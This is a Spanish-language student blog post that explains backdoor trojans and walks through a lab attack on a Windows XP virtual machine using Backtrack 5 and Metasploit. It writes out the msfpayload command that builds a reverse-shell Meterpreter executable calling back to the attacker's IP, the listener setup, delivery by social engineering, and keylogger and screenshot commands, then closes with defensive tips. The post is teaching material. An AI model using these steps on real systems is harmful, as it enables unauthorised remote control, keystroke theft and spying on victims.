Backdoor (Puerta trasera)-Ataque informático

Bienvenido al blog, hoy presentaremos un tipo de ataque informático llamado Backdoor. La práctica de este ataque se la realizo en la herramienta Backtrack 5 y es sólo para uso ACADEMICO.

Backtrack 5: Es un Sistema Operativo de distribución Debian-Linux que es una suite de Seguridad Informática y Auditoria de Sistemas, que me permite saber cuales son las vulnerabilidades de mi sistemas.

¿QUÉ ES BACKDOOR?

Un backdoor como lo dice su traducción “puerta trasera” es un troyano, que permite acceder de forma remota a un host-víctima ignorando los procedimientos de autentificación, facilitando así la entrada a la información del usuario sin conocimiento.Usa la estructura Cliente-Servidor para realizar la conexión.

Para poder infectar a la víctima con un backdoor se hace uso de la ingeniería social para que se pueda instalar el servidor que hará la conexión en ciertos tipos, en otros se hace una conexión directa por medio de escanear puertos vulnerables.

CARÁCTERITICAS DE BACKDOOR.

  • Son invisibles por el usuario.
  • Se ejecutan en modo silencioso al iniciar el sistema.
  • Pueden tener acceso total a las funciones del host-víctima.
  • Difícil eliminarlos del sistema ya que se instalan en carpetas de sistema, registros o cualquier dirección.
  • Usa un programa blinder para configurar y disfrazar al servidor para que la víctima no lo detecte fácilmente.

NOTA: Programa Blinder son aquellos que sirven para configurar, editar y disfrazar el archivo server.exe para que sea menos imperceptible por la víctima.

TIPOS DE BACKDOOR

Existen dos tipos de backdoor los de conexión directa y conexión inversa.

Conexión Directa.- Cuando el cliente(atacante) se conecta al servidor(víctima) que está previamente instalado. Aquí se ilustra varios de este tipo:

Conexión Inversa.-El servidor(víctima) donde se encuentra previamente instalado, se conecta al cliente(atacante). Aquí se ilustra varios de este tipo:

INSTRUCCIONES QUE SE PUEDE EJECUTAR EN EL HOST-VICTIMA LUEGO DE INSTALARSE BACKDOOR

  • Ejecutar aplicaciones (instalaciones de programas, anular procesos, etc.)
  • Modificar parámetros de configuración del sistema
  • Extraer y enviar información(archivos, datos, etc.) al host-victima.
  • Substraer o cambiar los password o archivos de passwords.
  • Mostrar mensajes en la pantalla .
  • Manipular el hardware de la host-víctima.

¿CÓMO SE PUEDE INFECTAR O TRANSMITIR BACKDOOR?

Mensajes de Correo

Son la forma más fácil de propagación por medio de un archivo anexado al mensaje y si el receptor comete el error de ejecutarlo, instalará el Servidor, permitiendo que el intruso pueda controlar el o los equipos infectados.

Otros servicios de Internet (HTTP, FTP, ICQ, Chat, Mensajería Instantánea)
Es posible visitar una página web en Internet, la misma que descargue automáticamente un troyano Backdoor al sistema quedará infectado, del mismo modo podrá ocurrir en servidores FTP.

El uso de los servicios de Mensajería Instantánea, como MSN Messenger, Yahoo Messenger, Talk o AOL Messenger, entre otros, han hecho posible la transmisión de virus, macro virus,gusanos, troyanos y backdoors, entre los usuarios conectados en una misma sesión.

Usando una LAN o dispositivos de almacenamiento

Usuarios de una misma red local o por medio de pendrives o cualquier dispositivo de almacenamiento que se pueda auto-ejecutar (AUTORUN). Para este tipo de infección se necesita usar la Ingenieria Social.

Ing. Social: Es el metodo de manipulación que utilizan las personas para poder obtener acceso a zonas restringidas como áreas físicas (edificios, departamento de sistemas, etc) o áreas lógicas(sistemas operativos, software de aplicación, servidores, etc ) sin ser detectados, para poder realizar una misión establecida previamente.

ATAQUE DE BACKDOOR CON BACKTRAK5 EN MAQUINA VIRTUAL( VMWARE 7)

VÍctima: Sistema Operativo Windows Professional XP SP3

IP: 192.168.10.6 — Mascara de red: 255.255.255.0

Atacante: Sistema Operativo Backtrack 5

IP: 192.168.10.5 — Mascara de red: 255.255.255.0

NOTA: Cuando se arranca Backtrack pide un usuario y contraseña este es User=root y Pass=toor, luego se tiene que digitar startx para arrancar en modo gráfico.

Diagrama de Presentación de Ataque

Paso 1: Identificamos a la vÍctima y obtenemos su ip, existen varias formas de obtenerlas por ejemplo en una LAN podemos usar herramientas como Advance IP Scaner (recomendado), una vez identificada la victima pasamos a crear el Backdoor en Backtrack 5.

Paso 2: Ingresamos a Backtrack 5 y abrimos una terminal consola.

Paso3: Escribimos el siguiente codigo con el cual se creará un archivo .exe que será nuestro servidor de Backdoor.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.5 LPORT=4444 X > click.exe

NOTA: En este código el atacante indica la IP, el puerto y especifica el nombre del virus que va enviar a la vÍctima.

Paso 4: Damos ENTER y se crea un archivo . exe en este caso click.exe y verificamos que se halla creado, este archivo esta en la carpeta /Home o podemos usar DOPHIN que es un explorador de archivos.

Paso 5: Ahora abrimos una sesión Metasploit la cual se puede hacer de varias formas: abrir una consola terminal y digitamos la siguiente sentencia cd /pentest/exploits/framework3 luego ./msfconsole. La otra forma es abrir una consola terminal y digitamos msfconsole y damos ENTER. Otra es ingresando por el menu de backtrack 5 .

Paso 6: Una vez iniciada la sesión de MSF abrimos un listener (Escuha) que va a estar activo espereando que el servidor que estará en la víctima se inicie. Aquí se utilizan las sentencias siguientes:
use exploit/multi/handler [ENTER] Iniciamos el Listener.

set PAYLOAD windows/meterpreter/reverse_tcp [ENTER] Plugins de Meterpreter.

set LHOST 192.168.10.5 [ENTER] Seteamos el IP del atacante.

set LPORT 4444 [ENTER] Seteamos el puerto del atacante.

NOTA: Por defecto usa el puerto 4444 en caso de cambiar de puerto se recomienda hacer un escaneo de puertos para ver cual esta vulnerable. Se puede usar la herramienta nmap de Backtrack la sentencia es : nmap [IP a escanear]

Una vez ingresado los datos del atacante explotamos usando la sentencia : exploit [ENTER]

Meterpreter: Es una familia de plugins avanzados de los mismos creadores del Metasploit Framework, que se utiliza sobre sistemas Windows comprometidos y tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional ni dejar rastros.

Paso 7: Ahora enviamos el backdoor (click.exe) que hicimos a nuestra victima por cualquier de los medios antes explicados usando ingeniria social en ciertos casos para que la victima utilice el archivo enviado.

Paso 8: Ahora podemos hacer uso de las herramientas de exploit/meterpreter para realizar actividades remotas a la PC de la víctima. Como ejemplo haremos una captura de pantalla. Con la sentencia :

screenshot /img.jpg [captura la imagen de la pantalla de la víctima]

NOTA: Se debe de poner la dirección donde se guardará el archivo jpg con el scrennshot. O por default al directorio

/opt/framework3/msf3/[nombre del archivo]

Otras sentencias de exploit para usar:

keyscan_start [activa un keylogger , cuando la víctima utilice notpad, o block de notas]

keyscan_dump [ muestra lo digitado en nuestra pantalla]

reboot [reinicia la máquina de la víctima]

RECOMENDACIONES:

  • Tener siempre el software actualizado pues así se instalan los parches de seguridad del sistema.
  • Procura no usar claves con nombres obvios asociados a los usuarios, preferible usa contraseñas de alta seguridad para evitar los ataques de diccionario.
  • Usa estricta política de manejo y control de los usuarios en carpetas compartidas.
  • Utilizar cuentas de usuario con privilegios limitados
  • Procura no instalar programas de dudosa procedencia ya sean estás descargas de internet, correos y medios extraíbles.
  • Configurar las zonas de internet Explorer y el filtrado de URL.
  • Activa el firewall (Filtrado y protección de las comunicaciones).

Descarga la diapositiva del proyecto:

Presentación de Backdoor

A Continuacion un video realizando un ataque Backdoor

Integrantes del Grupo # 5

  • Baque Ronald
  • Donoso Eliana
  • Espinoza Cindy
  • Puga Eduardo
  • Quintero Daniela
  • Sanchez Bonilla
  • Sanchez Suarez